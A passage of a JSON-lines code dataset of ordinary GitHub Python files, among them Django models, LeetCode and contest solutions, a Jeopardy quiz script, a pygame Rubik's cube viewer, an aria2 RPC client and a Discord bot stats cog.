print(root.diameter_of_bt(maxi))\n","repo_name":"kamrul-pu/problem-solving","sub_path":"data_structure/tree/dia_meter_of_bt.py","file_name":"dia_meter_of_bt.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16644347315","text":"from django.db import models\n\n\nCOMPLETED = 'C'\nABANDONED = 'A'\nONGOING = 'O'\nDELETED = 'D'\nSTATUS_CHOICES = (\n (COMPLETED, 'Completed'),\n (ABANDONED, 'Abandoned'),\n (ONGOING, 'Ongoing'),\n (DELETED, 'Deleted'),\n )\n\n\nclass Project(models.Model):\n name = models.CharField(max_length=200)\n objective = models.TextField()\n notes = models.TextField(blank=True)\n status = models.CharField(\n max_length = 1,\n choices = STATUS_CHOICES,\n default = ONGOING,\n )\n\n def __unicode__(self):\n return self.name\n\n\nclass ExperimentManager(models.Manager):\n def create_experiment(self,name,objective,notes,project_id):\n experiment = self.create(name=name, objective=objective, notes=notes, project_id=project_id)\n experiment.order = experiment.pk\n experiment.save()\n return experiment\n\n\nclass Experiment(models.Model):\n name = models.CharField(max_length=200)\n objective = models.TextField()\n notes = models.TextField(blank=True)\n status = models.CharField(\n max_length = 1,\n choices = STATUS_CHOICES,\n default = ONGOING,\n )\n project = models.ForeignKey(Project)\n order = models.PositiveIntegerField(unique=True,blank=True,default=0) # default value is replaced on creation\n\n objects = ExperimentManager()\n\n def update_order(self, new_order):\n old_order = self.order\n self.order = 0\n self.save() # to preserve uniqueness of order field\n\n up = new_order > old_order # whether you're going up or down in order\n next_order = old_order\n list_of_updated_experiments = []\n\n while next_order != new_order:\n next_order = next_order + 1 if up else next_order - 1\n next_experiment = type(self).objects.get(order=next_order)\n next_experiment.order = next_order - 1 if up else next_order + 1\n next_experiment.save()\n list_of_updated_experiments.append(next_experiment)\n self.order = new_order\n self.save()\n list_of_updated_experiments.append(self)\n return list_of_updated_experiments\n \n def __unicode__(self):\n return self.name\n\n\nclass Task(models.Model):\n name = models.CharField(max_length=200)\n # objective = models.TextField()\n 
notes = models.TextField(blank=True)\n status = models.CharField(\n max_length = 1,\n choices = STATUS_CHOICES,\n default = ONGOING,\n )\n date = models.DateField()\n experiment = models.ForeignKey(Experiment)\n\n def __unicode__(self):\n return self.name\n","repo_name":"MikesAtMIT/planner","sub_path":"plans/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33341056361","text":"import sys, threading, heapq, math\nfrom collections import defaultdict, Counter\ninput = sys.stdin.readline\n\n\ndef main():\n for _ in range(int(input())):\n n = int(input())\n look = input().strip()\n sums = []\n for i in range(n):\n if look[i] == \"L\":\n sums.append(i)\n else:\n sums.append(n-i-1)\n final = []\n for i in range(n):\n final.append(max(i,n-i-1))\n res = []\n left, right = 0, n-1\n total = sum(sums)\n for i in range(n//2):\n if final[i] != sums[i]:\n total += final[i] - sums[i]\n res.append(total)\n if final[n-i-1] != sums[n-i-1]:\n total += final[n-i-1] - sums[n-i-1]\n res.append(total)\n while len(res) < n:\n res.append(total)\n print(*res)\n \nmain()\n \n# threading.stack_size(1 << 27)\n# sys.setrecursionlimit(1 << 30)\n# main_thread = threading.Thread(target=main)\n# main_thread.start()\n# main_thread.join()\n ","repo_name":"natitedros/Competitive-Programming","sub_path":"campContest/Line.py","file_name":"Line.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9404812282","text":"#!/usr/bin/python3\n'''\njeopardy game\n'''\n\n# import a lib to make an http request\nimport requests\n\ndef main():\n # prompt for initials\n player = input(\"Type in your initals: \")\n rounds = input(\"How many rounds would you like to play? \")\n playerscore = 0 # counter for the player score\n\n # make a req to http://jservice.io/api/random\n zresp = requests.get(f\"http://jservice.io/api/random?count={rounds}\")\n\n # strip off json from 200 response\n listofquestions = zresp.json()\n\n # run the game by loopoing over the results\n for jquestion in listofquestions:\n # each time through loop, pose Q to player\n print(f\"Alex says: {jquestion['question']}\")\n playeranswer = input(f\"\\tType your Answer --> \")\n \n # user can respond by typing input (normalize to lowercase) \n if playeranswer.lower() == jquestion['answer'].lower():\n print(f\"Alex says: That's right, you add {jquestion['value']} to your score\")\n # alter playerscore counter, increase by the question's point value\n playerscore = playerscore + jquestion['value']\n else: \n print(f\"Alesx says:Not quite right? 
The answer were were looking for was {jquestion['answer']}\")\n\n # after 10 rounds, show the player's score\n print(f\"Alex says: Let's see how you did.\\nLooks like your score is {playerscore}\")\n\n # if their score is higher than and of those in highscore.txt, ask for then write palyer's intials, and their score, to highscore.txt\n with open(\"jeopardyhighscores.txt\") as jhs:\n highscorelist = jhs.readlines()\n\n # sore the data taken from the file\n highscorelist.sort()\n\n for score in highscorelist:\n if playerscore > int(score.rstrip(\"\\n\")):\n print(\"looks like a high score\")\n highscorelist.remove(score)\n highscorelist.append(str(playerscore))\n break\n\n with open(\"jeopardyhighscores.txt\", \"w\") as jhs:\n for score in highscorelist:\n jhs.write(score.rstrip(\"\\n\")+\"\\n\")\n\nif __name__ == \"__main__\":\n main()\n\n \n","repo_name":"BruceBAWest/pyb06292020","sub_path":"jeopardy/jeopardygame.py","file_name":"jeopardygame.py","file_ext":"py","file_size_in_byte":2083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22748274741","text":"from .render import Canvas, CubeDrawable, SkewbDrawable\nfrom . import cube, skewb\nfrom .perm import P\nimport pygame as pg\nimport time\nimport math\nimport threading\nimport collections\n\n\nclass InteractiveCanvas(Canvas):\n def __init__(self):\n self.surface = None\n\n def set_size(self, size):\n self.surface = pg.Surface(size)\n self.surface.fill((0, 0, 0))\n\n def draw_rect(self, xy, color):\n x0, y0, x1, y1 = xy\n w = x1 - x0 + 1\n h = y1 - y0 + 1\n pg.draw.rect(self.surface, color, (x0, y0, w, h))\n\n def draw_poly(self, points, color):\n pg.draw.polygon(self.surface, color, points)\n\n def get_surface(self):\n return self.surface\n\n\nclass Scene:\n def update(self, events, dt):\n pass\n\n def render(self, screen):\n pass\n\nclass DrawableScene(Scene):\n def __init__(self, drawable, initial_state = P(dict())):\n self.drawable = drawable\n self.state = initial_state\n self.initial_state = initial_state\n\n def render(self, screen):\n canvas = InteractiveCanvas()\n self.drawable.render(self.state, canvas)\n screen.blit(pg.transform.scale(canvas.get_surface(), screen.get_size()), (0, 0))\n\nclass CubeScene(DrawableScene):\n def __init__(self, initial_state = P(dict())):\n super().__init__(CubeDrawable, initial_state=initial_state)\n\nclass InteractiveCubeScene(CubeScene):\n def update(self, events, dt):\n for event in events:\n if event.type == pg.KEYDOWN:\n turn = {\n 30: cube.U,\n 40: cube.D,\n 46: cube.L,\n 27: cube.R,\n 41: cube.F,\n 56: cube.B,\n 58: cube.M,\n 26: cube.E,\n 39: cube.S,\n 53: cube.X,\n 29: cube.Y,\n 52: cube.Z\n }.get(event.scancode, None)\n if turn is None:\n continue\n\n if pg.key.get_mods() & pg.KMOD_SHIFT != 0:\n turn **= -1\n\n self.state @= turn\n\nclass InteractiveSkewbScene(DrawableScene):\n def __init__(self, initial_state = P(dict())):\n super().__init__(SkewbDrawable, initial_state=initial_state)\n\n def update(self, events, dt):\n for event in events:\n if event.type == pg.KEYDOWN:\n turn = {\n 30: skewb.U,\n 46: skewb.L,\n 27: skewb.R,\n 56: skewb.B,\n }.get(event.scancode, None)\n if turn is None:\n continue\n\n if pg.key.get_mods() & pg.KMOD_SHIFT != 0:\n turn **= -1\n\n self.state @= turn\n\n\nclass PlaybackCubeScene(CubeScene):\n def __init__(self, sequence, initial_state = P(dict()), frametime = 1):\n super().__init__(initial_state)\n self.sequence = list(sequence)\n self.initial_state = initial_state\n self.time = 0\n self.i = 0\n 
self.frametime = frametime\n\n def update(self, events, dt):\n self.time += dt\n if self.time > self.frametime:\n self.time -= self.frametime\n if self.i >= len(self.sequence):\n self.state = self.initial_state\n self.i = 0\n else:\n self.state @= self.sequence[self.i]\n self.i += 1\n\nclass StepCubeScene(CubeScene):\n def __init__(self, sequence, initial_state = P(dict())):\n super().__init__(initial_state)\n self.sequence = list(sequence)\n self.i = -1\n\n def update(self, events, dt):\n for event in events:\n if event.type == pg.KEYDOWN:\n if event.scancode == 113 or \\\n (pg.key.get_mods() & pg.KMOD_SHIFT != 0 and event.scancode == 65):\n # step back\n if self.i >= 0:\n self.state @= (self.sequence[self.i] ** -1)\n self.i -= 1\n elif event.scancode in (65, 114):\n # step fwd\n if (self.i + 1) < len(self.sequence):\n self.i += 1\n self.state @= self.sequence[self.i]\n\nclass StdinCubeScene(CubeScene):\n def __init__(self, initial_state = P(dict())):\n super().__init__(initial_state)\n self.q = collections.deque()\n self.lock = threading.Lock()\n\n def stdin_reader(q, lock):\n while True:\n try:\n inputs = list(input())\n except EOFError:\n continue\n for s in inputs:\n s = s.upper()\n if s in \"UDLRFBMESXYZ'\":\n with lock:\n q.append(s)\n\n self.reader = threading.Thread(target=stdin_reader, args=(self.q, self.lock), daemon=True)\n self.reader.start()\n\n def update(self, events, dt):\n with self.lock:\n for event in events:\n if event.type == pg.KEYDOWN and event.scancode == 65:\n # spacebar pressed\n self.state = self.initial_state\n while len(self.q) > 0:\n s = self.q.popleft()\n t = getattr(cube, s)\n if len(self.q) > 0 and self.q[0] == '\\'':\n t **= -1\n self.q.popleft()\n self.state @= t\n\n\ndef run(scene):\n\n W, H = win_w, win_h = 640, 480\n\n pg.init()\n\n win_offset_x = win_offset_y = 0\n\n W_FLAGS = (pg.HWSURFACE | pg.DOUBLEBUF | pg.RESIZABLE)\n\n window = pg.display.set_mode((win_w, win_h), W_FLAGS)\n screen = pg.Surface((W, H), pg.SRCALPHA, 32)\n\n font = pg.font.SysFont(None, 24) # default font\n frames = 0\n fpstext = font.render(f\"{frames} FPS\", True, (255, 128, 0))\n running_t = time.time()\n\n FPS = 60\n clock = pg.time.Clock()\n running = True\n\n try:\n while running:\n dt = clock.tick(FPS) / 1000 # milliseconds\n current_t = time.time()\n if current_t - running_t > 1:\n fpstext = font.render(f\"{frames} FPS\", True, (255, 128, 0))\n running_t += 1\n frames = 0\n\n events = []\n for event in pg.event.get():\n if event.type == pg.QUIT:\n running = False\n elif event.type == pg.VIDEORESIZE:\n # the window has been resized\n win_w, win_h = event.size\n pg.display.set_mode((win_w, win_h), W_FLAGS)\n\n # keep aspect ratio of screen\n if (win_w / win_h) < (W / H):\n tmp = int(H / W * win_w)\n win_offset_x = 0\n win_offset_y = (win_h - tmp) // 2\n win_h = tmp\n else:\n tmp = int(W / H * win_h)\n win_offset_x = (win_w - tmp) // 2\n win_offset_y = 0\n win_w = tmp\n else:\n events.append(event)\n\n scene.update(events, dt)\n\n # render stuff on screen\n screen.fill((0, 0, 0)) # clear\n screen.blit(fpstext, (0, 0))\n\n scene.render(screen)\n\n # fit screen to window\n window.blit(pg.transform.scale(screen, (win_w, win_h)), (win_offset_x, win_offset_y))\n pg.display.flip() # update window\n frames += 1\n except KeyboardInterrupt:\n pass\n\n pg.quit()\n\nif __name__ == \"__main__\":\n 
run(InteractiveCubeScene())\n","repo_name":"thamma/SmartCube","sub_path":"cube_implementation/interactive.py","file_name":"interactive.py","file_ext":"py","file_size_in_byte":7763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2327371078","text":"import random\ndef solution(A):\n b = A\n i = 0\n while True:\n if b[i] <= 1 and i == len(b)-1:\n break\n t = 0\n if b[i]%2 == 0:\n t = b[i]//2\n else:\n t = (b[i]-1)//2\n b[i] = b[i] - 2*t\n if i+1 < len(b):\n b[i+1] += t\n else:\n b.append(t)\n i += 1\n print(b, len(b))\n return sum(b)\n\na = [0 for _ in range(100000)]\nprint(solution(a))\n# print(solution([1000000]))","repo_name":"lebahoang/cp","sub_path":"leetcode/wnd.py","file_name":"wnd.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9753793869","text":"# class Solution(object):\n# def pivotIndex(self, nums):\n# \"\"\"\n# :type nums: List[int]\n# :rtype: int\n# \"\"\"\n# sumL = 0\n# sumR = sum(nums)\n# for i in range(len(nums)):\n# sumR -= nums[i]\n# if sumL == sumR:\n# return i\n# sumL += nums[i]\n# return -1\n\n# nums = [1,7,3,6,5,6]\n# sol = Solution()\n# print(sol.pivotIndex(nums))\n\n\n\"\"\"\nAn index is said to be pivot when the sum of the array to the left is the same as the sum of the array to \nthe right.\n\"\"\"\n\nclass Solution:\n def pivotIndex(self, nums):\n sumLeft = 0\n lst_total = sum(nums)\n sumRight = lst_total\n \n for i in range(len(nums)):\n sumRight -= nums[i]\n if sumLeft == sumRight:\n return i\n sumLeft += nums[i]\n return -1\n\nnums = [1,7,3,6,5,6]\nsol = Solution()\nprint(sol.pivotIndex(nums))\n\n","repo_name":"SeunFashina002/DataStructures_and_Algorithm","sub_path":"challenges/pivot_index.py","file_name":"pivot_index.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"11531313582","text":"class banco():\n\n institucion_perteneciente = None\n cajero_automatico = None\n atencion_cliente = None\n personal = None\n sala_de_espera = None\n escala = None\n cajas = None\n escaleras = None\n banca_movil = None\n prestamos = None\n \n \n def __init__(self):\n print(\"Clase banco.\")\n \n def invertir (self):\n print(\"Metodo invertir\")\n \n def prestar (self):\n print(\"Metodo prestar\")\n \n def administrar (self):\n print(\"Metodo administrar\")\n \n def financiar (self):\n print(\"Metodo financiarr\")\n \n def asesorar (self):\n print(\"Metodo asesorar\")\n\n\nbbva = banco()\nbbva.institucion_perteneciente = \"BBVA\"\nbbva.cajero_automatico = \"si\"\nbbva.atencion_cliente = \"si\"\nbbva.personal = \"si\"\nbbva.sala_de_espera = \"si\"\nbbva.escala = \"Dos pisos\"\nbbva.cajas = \"si\"\nbbva.escaleras = \"si\"\nbbva.banca_movil = \"si\"\nbbva.prestamos = \"si\"\n\nprint(bbva.institucion_perteneciente)\nprint(bbva.cajero_automatico)\nprint(bbva.atencion_cliente)\nprint(bbva.personal)\nprint(bbva.sala_de_espera)\nprint(bbva.escala)\nprint(bbva.cajas)\nprint(bbva.escaleras)\nprint(bbva.banca_movil)\nprint(bbva.prestamos)\n\nbbva.administrar()\nbbva.asesorar()\nbbva.financiar()\nbbva.invertir()\nbbva.prestar()","repo_name":"FernandoLopezTorrez/poo-1720110288","sub_path":"semana2/banco.py","file_name":"banco.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28733053895","text":"# Important modules to 
import\nimport numpy as np\nimport pandas as pd\nimport random\nfrom random import randint\nimport time\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# Orders the similarty expressions from smallest to largest\ndef sort_expressions(s):\n s = np.array(s)\n order = np.argsort(s)\n #Sorts s into order smallest to largest\n s.sort(axis=0)\n n=np.size(s)\n mu=np.array(np.zeros(n+1))\n mu[0]=s[0]\n for i in range(1, n):\n mu[i]=s[i]-s[i-1]\n #print(mu[i])\n mu[n]=1-s[-1] \n return [s, mu, order]\n\n# Creates the truth table\ndef create_truth_table(variables, formula, s):\n variables3=[]\n s_new = []\n \n# Only considers similarity expressions that are invloved in sentence theta\n for i in range(0,len(variables)):\n if any(variables[i] in s for s in formula):\n variables3.append(variables[i])\n s_new.append(s[i])\n [s, mu, order] = sort_expressions(s_new)\n n=len(variables3)\n variables2=[]\n order = order[::-1]\n \n \n for i in range(0,n):\n variables2.append(variables3[order[i]])\n m = np.ones((n+1,n))\n m=np.tril(m, -1)\n rev_mu = mu[::-1]\n m=np.asarray(m)\n df = pd.DataFrame(m,columns= variables2)\n df.insert(loc=0, column='S_val', value = rev_mu)\n \n column_names=[]\n c=0\n \n# Loops through the entire formula\n for i in range(0,len(formula)):\n # Checks in a sub bracket\n if formula[i][0]!='or':\n #Creates column name for header of data frame\n seperator = ' '\n column_names.append(seperator.join(formula[i]))\n sval=[]\n zero=False\n #Looking through individual formula\n for j in range(0, len(formula[i])):\n if formula[i][j]=='not':\n zero=True\n # Goes onto next j value if zero is true\n continue\n elif formula[i][j]=='and':\n continue\n else:\n if zero==True:\n sval.append([formula[i][j],0])\n zero=False\n else:\n sval.append([formula[i][j],1])\n \n if len(formula[i])==1:\n truth =np.array(np.zeros(len(df)))\n #When formula length =1 (ie when only one value in subbracket), no need to calculate values\n for k in range(0,len(df)):\n truth[k]=df[sval[0][0]][k]\n \n # Number in sub bracket is greater than 1\n else:\n truth =np.array(np.zeros(len(df)))\n for l in range(0,len(df)):\n istrue = True\n for k in range(0,len(sval)):\n if df[sval[k][0]][l]==sval[k][1]:\n istrue=True\n else:\n istrue=False\n break\n if istrue==True:\n truth[l]=1\n else:\n truth[l]=0\n \n df[column_names[c]]=truth\n c=c+1;\n \n # Now bring all togther by evaluating all rows - all joined by an 'or'\n truth =np.array(np.zeros(len(df)))\n seperator = ') or ('\n column_name_joint = '(' + seperator.join(column_names) + ')'\n for i in range(0,len(df)):\n istrue = True\n for j in range(0,len(column_names)):\n if df[column_names[j]][i]==1:\n istrue=True\n break\n else:\n istrue=False\n if istrue==True:\n truth[i]=1\n else:\n truth[i]=0\n \n df[column_name_joint]=truth\n sval_sum = evaluation(df,column_name_joint)\n return df, sval_sum\n \n\n#Evaluation function \ndef evaluation(df,column_name_joint):\n #Need to find the sum of svals\n sval_sum=0\n for i in range(0,len(df)):\n if df[column_name_joint][i]==1:\n sval_sum=sval_sum+df['S_val'][i]\n sval_sum = round(sval_sum,4)\n return sval_sum\n\n\n# Formula generator that generates a formula where n defines the number of similarity expressions \n# k defines the length of the formula\n# or's are between sub_brackets, and's are in sub_brackets\ndef new_formula_generator(n,k):\n [variables, s]= create_variables(n)\n connective_list = ['and', 'or']\n variable_list = variables\n formula=[]\n connective=[]\n \n # Number of connectives is k-1\n for j in range(0,k-1):\n 
connective.append(random.choice(connective_list))\n \n #Create an empty sub brakcket\n sub_bracket=[]\n \n for i in range(0,k): \n # Decide on whether a 'not' is present or not\n if randint(0,1)==1:\n not_present=True\n else:\n not_present=False \n s_value = random.choice(variable_list)\n \n # Keep iterating through s_value if in formula subbracket already\n while (s_value in sub_bracket)==True:\n # Stops loop from getting stuck if k>n\n if all(x==connective[0] for x in connective)==False:\n s_value = random.choice(variable_list)\n else:\n break\n \n# Checks for 'not's\n if not_present==True:\n #if first loop through j\n sub_bracket.append('not')\n \n sub_bracket.append(s_value)\n \n if i!=(k-1):\n \n if connective[i]=='and':\n sub_bracket.append(connective[i])\n \n elif connective[i]=='or':\n # Close bracket and add to formula\n formula.append(sub_bracket)\n # Add connective on its own\n formula.append([connective[i]])\n sub_bracket=[]\n \n else:\n formula.append(sub_bracket)\n \n return [formula, variables, s]\n \n\n\ndef create_variables(n):\n# Initialise variables and vectors\n num_variables=n\n s=[]\n variables=[]\n \n for i in range(0,num_variables):\n s.append(round(random.uniform(0.001, 0.999),4))\n variables.append('s'+str(i+1))\n \n return variables, s\n\n\n\ndef analysis(n,k):\n # Average time over 100 attempts of n or k\n time2=[]\n \n for p in range(0,100):\n start_time = time.time()\n formula, variables, s= new_formula_generator(n,k)\n df, sval_sum = create_truth_table(variables, formula, s)\n end_time = time.time()\n time2.append(end_time-start_time)\n \n time_taken= np.mean(time2)\n return df, formula, sval_sum, time_taken, s\n \n \n# Code to run analysis once\ndef run_once(n,k):\n formula, variables, s= new_formula_generator(n,k)\n df, sval_sum = create_truth_table(variables, formula, s)\n return formula, variables, df, sval_sum\n \n \n# Code for testing a specific formula\ndef test():\n formula = [['not','s1','and','not','s2','and','not','s3']]\n variables = ['s1','s2','s3','s4','s5']\n s = [0.75,0.3,0.12, 0.33, 0.98]\n df, sval_sum = create_truth_table(variables, formula, s)\n return formula, variables, df, sval_sum, s \n\n\n\nif __name__ == \"__main__\": \n #Seaborn for graphs\n sns.set()\n \n \n ###### k=15, n varied ######\n total_time=[]\n k=5\n n_vec=[]\n for n in range(5,100):\n df, formula, sval_sum, time_taken, s = analysis(n,k)\n n_vec.append(n)\n total_time.append(time_taken)\n print(n)\n \n plt.xlabel('Number of similarity values (n)')\n plt.ylabel('Computational Time (s)')\n plt.scatter(n_vec, total_time,marker=\"+\") \n plt.plot(np.unique(n_vec), np.poly1d(np.polyfit(n_vec, total_time, 2))(np.unique(n_vec)), 'r', linewidth=3.0)\n plt.show() \n \n ###### ######\n \n # Fixed number of similarity expressions\n ###### n=1000, k varied ######\n total_time=[]\n n=40\n k_vec=[]\n for k in range(1,100):\n df, formula, sval_sum, time_taken, s = analysis(n,k*10)\n k_vec.append(k*10)\n total_time.append(time_taken)\n print(k)\n plt.figure()\n plt.xlabel('Length of Formula (k)')\n plt.ylabel('Computational Time (s)')\n plt.scatter(k_vec, total_time,marker=\"+\") \n plt.plot(np.unique(k_vec), np.poly1d(np.polyfit(k_vec, total_time, 2))(np.unique(k_vec)), 'r',linewidth=3.0)\n plt.show()\n \n ###### ######\n \n # Test a specific formula \n formula, variables, df, sval_sum, s = test()\n \n 
","repo_name":"hh15160/thresholdsimilaritylogic","sub_path":"TotalDependence.py","file_name":"TotalDependence.py","file_ext":"py","file_size_in_byte":8610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25426640398","text":"#!/usr/bin/python3\n# https://leetcode.com/problems/is-subsequence/\n\n\ndef isSubsequence(s: str, t: str, i: int, j: int) -> bool:\n if i == 0:\n return True\n if j == 0:\n return False\n\n if s[i - 1] == t[j - 1]:\n return isSubsequence(s, t, i - 1, j - 1)\n\n return isSubsequence(s, t, i, j - 1)\n\n\nif __name__ == \"__main__\":\n testcase = (\n {\n \"s\": \"abc\",\n \"t\": \"ahbgdc\",\n \"output\": True\n },\n {\n \"s\": \"axc\",\n \"t\": \"ahbgdc\",\n \"output\": False\n },\n {\n \"s\": \"AXY\",\n \"t\": \"ADXCPY\",\n \"output\": True\n },\n {\n \"s\": \"AXY\",\n \"t\": \"YADXCP\",\n \"output\": False\n },\n {\n \"s\": \"gksrek\",\n \"t\": \"geeksforgeeks\",\n \"output\": True\n },\n )\n\n for test in testcase:\n print(isSubsequence(test[\"s\"], test[\"t\"], len(test[\"s\"]), len(test[\"t\"])))\n","repo_name":"tahmid-tanzim/problem-solving","sub_path":"Dynamic_Programming/is-subsequence.py","file_name":"is-subsequence.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"15028152189","text":"class maxFlow:\r\n def __init__(self, num):\r\n self.Len = num\r\n self.L = [[0] * num for i in range(num)]\r\n\r\n def setL(self, a, b, x):\r\n self.L[a][b] = x\r\n\r\n def setLR(self, a, b, x):\r\n self.setL(a, b, x)\r\n self.setL(b, a, x)\r\n\r\n def setS(self, s, X, Y):\r\n for i in range(len(X)):\r\n self.setL(s, X[i], Y[i])\r\n\r\n def setSn(self, s, X, n):\r\n Y = [n for i in range(len(X))]\r\n self.setS(s, X, Y)\r\n\r\n def setT(self, t, X, Y):\r\n for i in range(len(X)):\r\n self.setL(X[i], t, Y[i])\r\n\r\n def setTn(self, t, X, n):\r\n Y = [n for i in range(len(X))]\r\n self.setT(t, X, Y)\r\n\r\n def getAns(self, t):\r\n return sum(self.L[t])\r\n\r\n def DFS(self, s, t):\r\n S = [[s, 0]]\r\n P = [0] * self.Len\r\n D = [0] * self.Len\r\n while S != []:\r\n k = S.pop()\r\n P[k[1]] = k[0]\r\n if self.L[k[0]][self.Len - 1] > 0:\r\n P[k[1] + 1] = self.Len - 1\r\n return P\r\n for i in range(self.Len):\r\n if D[i] == 0 and self.L[k[0]][i] > 0:\r\n S.append([i, k[1] + 1])\r\n D[i] = 1\r\n return False\r\n\r\n def exe(self):\r\n while True:\r\n P = self.DFS(0, T - 1)\r\n if P == False:\r\n break\r\n mi = self.L[P[1]][P[0]]\r\n Last = self.Len\r\n for i in range(2, Last):\r\n if P[i - 1] == self.Len - 1:\r\n Last = i\r\n break\r\n t = self.L[P[i - 1]][P[i]]\r\n if t < mi:\r\n mi = t\r\n for i in range(1, Last):\r\n self.L[P[i - 1]][P[i]] -= mi\r\n self.L[P[i]][P[i - 1]] += mi\r\n\r\nN, G, E = list(map(int, input().split()))\r\np = list(map(int, input().split()))\r\nab = [list(map(int, input().split())) for i in range(E)]\r\n\r\nT = N + 1\r\n\r\nm = maxFlow(T)\r\nfor i in ab:\r\n m.setLR(i[0], i[1], 1)\r\n\r\nm.setTn(-1, p, 1)\r\nm.exe()\r\n\r\nprint(m.getAns(-1))","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/abc010/D/4507486.py","file_name":"4507486.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"74904754471","text":"#!/usr/bin/env python3\n\nimport argparse\nimport xmlrpc.client\n\nparser = argparse.ArgumentParser(description='a script to control aria2 XML-RPC 
server')\nparser.add_argument('--rpc-method', nargs=None, default='addUri', help='Set RPC method.')\nparser.add_argument('--rpc-server', nargs=None, default='http://127.0.0.1:6800/rpc', help='Set XML-RPC server address.')\nparser.add_argument('--rpc-secret', nargs=None, default=None, help='Set RPC secret authorization token.')\n\nargs, other_options = parser.parse_known_args()\n\nsep_index = other_options.index('--')\nopt_args = dict((other_options[i].lstrip('--'), other_options[i+1]) for i in range(0, len(other_options[0:sep_index]), 2))\npos_args = other_options[sep_index+1:]\n\nparams = []\n\nif args.rpc_secret is not None:\n params.append('token:{0}'.format(args.rpc_secret))\n\nif args.rpc_method == 'addUri':\n params.append(pos_args)\nelif len(pos_args) > 0:\n params.append(pos_args[0])\n\nwith xmlrpc.client.ServerProxy(args.rpc_server) as proxy:\n getattr(proxy.aria2, args.rpc_method)(*params)\n","repo_name":"JaHIY/aria2rpc","sub_path":"aria2rpc.py","file_name":"aria2rpc.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11055409640","text":"\nfrom datetime import datetime\nimport time\n\nfrom discord.ext import commands\nimport psutil\nimport utility.discordembed as dmbd\n\nclass Information:\n\n def __init__(self, bot):\n self.bot = bot\n self.initialtime = time.time()\n self.totalmembers = set({})\n\n def getuptime(self):\n seconds = int(time.time() - self.initialtime)\n minutes = 0\n hours = 0\n days = 0\n\n if seconds > 86399:\n days = int(seconds/86400)\n seconds = seconds % 86400\n if seconds > 3599:\n hours = int(seconds/3600)\n seconds = seconds % 3600\n if seconds > 59:\n minutes = int(seconds/60)\n seconds = seconds % 60\n\n return \"{d}d {h}h {m}m {s}s\".format(d=days, h=hours, m=minutes, s=seconds)\n\n @staticmethod\n def getcpuusage():\n return psutil.Process().cpu_percent() / psutil.cpu_count()\n\n @staticmethod\n def getmemusage():\n return psutil.Process().memory_info().rss / (1024 ** 2)\n\n def gettotalusers(self):\n for x in self.bot.servers:\n for y in x.members:\n self.totalmembers.add(y.id)\n return len(self.totalmembers)\n\n @commands.command(pass_context=True)\n async def ping(self, ctx):\n pingpong = datetime.now() - ctx.message.timestamp\n pingpong = pingpong.microseconds / 1000\n second = await self.bot.say('*Recherche du ping en cours...*')\n heartbeat = second.timestamp - ctx.message.timestamp\n heartbeat = heartbeat.microseconds / 1000\n description = (\n ':ping_pong: `' + str(pingpong) + ' ms`\\n' +\n ':blue_heart: `' + str(heartbeat) + ' ms`'\n )\n em = dmbd.newembed(ctx.message.author, d=description)\n await self.bot.edit_message(second, new_content='',embed=em)\n\n @commands.command(pass_context=True)\n async def bstats(self, ctx):\n author = ctx.message.author\n title = 'Stats pour ' + self.bot.user.name\n desc = 'Ne-e-e-e-e-e regarde pas mes stats... 
Trouduc!'\n url = \"https://github.com/dearvoodoo/\"\n # trello = \"Add Later\"\n inviteurl = (\n \"http://dear-voodoo.com\"\n )\n\n supporturl = \"https://discord.gg/mZHrDXW\"\n\n em = dmbd.newembed(author, title, desc, url)\n em.add_field(name='Utilisateur(s) Total', value=self.gettotalusers())\n em.add_field(name='Serveur(s) avec RED', value=len(self.bot.servers))\n em.add_field(name='Utilisateur(s) sur ce serveur', value=len(ctx.message.server.members))\n em.add_field(name='Uptime', value=self.getuptime())\n em.add_field(name='CPU', value=\"{0:.2f}%\".format(self.getcpuusage()))\n em.add_field(name='Mémoire', value=\"{0:.2f} MB\".format(self.getmemusage()))\n # em.add_field(name='Trello', value='[Trello Page]({})'.format(trello))\n em.add_field(name='Le DEV', value='[Clique sur moi :)]({})'.format(inviteurl))\n em.add_field(name='Support', value='[Lien Discord]({})'.format(supporturl))\n\n await self.bot.say(embed=em)\n\n @commands.command()\n async def uptime(self):\n await self.bot.say(\"```\" + self.getuptime() + \"```\")\n\n\ndef setup(bot):\n bot.add_cog(Information(bot))\n","repo_name":"Krystool/Alastor-Bot","sub_path":"modules/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31260459626","text":"#!/usr/bin/env python3\n\"\"\" Util for backup / deploy dotfiles.\n\"\"\"\n\nimport os\nimport re\nimport sys\nimport shutil\nimport platform\nimport datetime\nfrom subprocess import run, PIPE\nimport yaml\n\nHOME_DIR = os.getenv(\"HOME\")\nHOME_PIP = \"[_HOME_]\"\nTHIS_DIR = 